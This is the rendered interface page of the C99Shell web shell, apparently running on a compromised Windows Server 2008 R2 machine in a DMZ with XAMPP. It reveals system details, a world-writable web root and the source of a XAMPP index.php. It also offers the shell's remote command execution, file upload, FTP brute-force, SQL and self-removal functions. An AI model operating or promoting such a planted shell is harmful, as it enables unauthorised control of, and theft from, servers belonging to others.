!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\dmz\security\htdocs\   drwxrwxrwx
Free 4.13 GB of 39.52 GB (10.44%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     index.php (771 B)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
    
if (file_get_contents("lang.tmp") == "") {
        
header("Location: splash.php");
        exit;
    }
?>

<html>
    <head>
        <meta name="author" content="Kai Oswald Seidler, Kay Vogelgesang, Carsten Wiedmann">
        <link rel="icon" href="img/xampp.ico">
        <?php include "lang/".file_get_contents("lang.tmp").".php"?>
        <title><?php echo $TEXT['global-xampp']; ?> | Security Section</title>
    </head>

    <frameset rows="68,*" border="0" framespacing="0">
        <frame name="head" src="head.php" frameborder="0" scrolling="no">
        <frameset cols="170,*" border="0" framespacing="0">
            <frame name="navi" src="navi.php" frameborder="0" scrolling="auto">
            <frame name="content" src="security.php" frameborder="0" marginwidth="20">
        </frameset>
    </frameset>
</html>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0156 ]--